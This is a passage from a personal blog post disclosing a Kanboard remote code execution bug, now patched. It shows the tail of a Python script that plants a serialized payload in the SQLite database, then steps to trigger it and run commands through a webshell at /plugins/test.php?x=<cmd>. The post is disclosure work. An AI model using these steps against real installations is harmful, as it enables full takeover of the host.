 """</span><span class="p">,</span> <span class="p">(</span><span class="n">payload</span><span class="p">.</span><span class="n">decode</span><span class="p">(</span><span class="s">'utf-8'</span><span class="p">),</span> <span class="mi">1</span><span class="p">))</span> <span class="c1"># CHANGE ROW ID HERE IF NOT TARGETING FIRST ROW
</span>
 <span class="n">conn</span><span class="p">.</span><span class="n">commit</span><span class="p">()</span>

 <span class="n">cursor</span><span class="p">.</span><span class="n">execute</span><span class="p">(</span><span class="s">"SELECT data FROM project_activities WHERE id = 1"</span><span class="p">)</span>
 <span class="n">row</span> <span class="o">=</span> <span class="n">cursor</span><span class="p">.</span><span class="n">fetchone</span><span class="p">()</span>
 <span class="k">print</span><span class="p">(</span><span class="nb">repr</span><span class="p">(</span><span class="n">row</span><span class="p">[</span><span class="mi">0</span><span class="p">]))</span>
</code></pre></div>    </div>
  </li>
  <li>Re-zip the db.sqlite file and upload it.</li>
  <li>
    <p>Visit the task activity stream (in my case http://localhost:3000/task/1/activity). You should see the following error.</p>

    <figure style="text-align: center; margin: 2em 0;">
   <img src="/assets/img/kanboard/kanboard_tostring_success.png" alt="Password Reset" style="display: block; margin-left: auto; margin-right: auto; max-width: 90%; border-radius: 8px;" />
 </figure>

    <p>This means that toString was called on the gadget and that file write should have succeeded.</p>
  </li>
  <li>The reverse shell should be written into the plugins directory. Visit <code class="language-plaintext highlighter-rouge">/plugins/test.php?x=&lt;cmd&gt;</code> to run arbitrary system commands via the webshell.</li>
</ol>

<p>Here’s an example of me running the id command via <code class="language-plaintext highlighter-rouge">http://localhost:3000/plugins/test.php?x=id</code></p>

<figure style="text-align: center; margin: 2em 0;">
  <img src="/assets/img/kanboard/kanboard_rev_shell.png" alt="Password Reset" style="display: block; margin-left: auto; margin-right: auto; max-width: 90%; border-radius: 8px;" />
</figure>

<p>Success! We can now run any command we want on the host machine.
<br />
<br />
<br /></p>

<h3 id="final-thoughts">Final Thoughts</h3>
<p>Even something as unassuming as a simple formatter can be dangerous, especially when paired with methods like <code class="language-plaintext highlighter-rouge">unserialize</code>. Turns out that the deserialization was a legacy feature that’s not really used anymore. Just shows how tech debt can often become a backdoor for attackers.</p>

<p>Note that this has been patched and a security advisory has been published here: <a href="https://github.com/kanboard/kanboard/security/advisories/GHSA-359x-c69j-q64r">GHSA-359x-c69j-q64r advisory</a></p>


  </div><a class="u-url" href="/posts/kanboard_rce.html" hidden></a>
</article>

      </div>
    </main><footer class="site-footer h-card">
  <data class="u-url" href="/"></data>

  <div class="wrapper">

    <h2 class="footer-heading">Bryan&#39;s Blog</h2>

    <div class="footer-col-wrapper">
      <div class="footer-col footer-col-1">
        <ul class="contact-list">
          <li class="p-name">Bryan Lynch</li><li><a class="u-email" href="mailto:bml312@nyu.edu">bml312@nyu.edu</a></li></ul>
      </div>

      <div class="footer-col footer-col-2"><ul class="social-media-list"></ul>
</div>

      <div class="footer-col footer-col-3">
        <p></p>
      </div>
    </div>

  </div>

</footer>
</body>

</html>
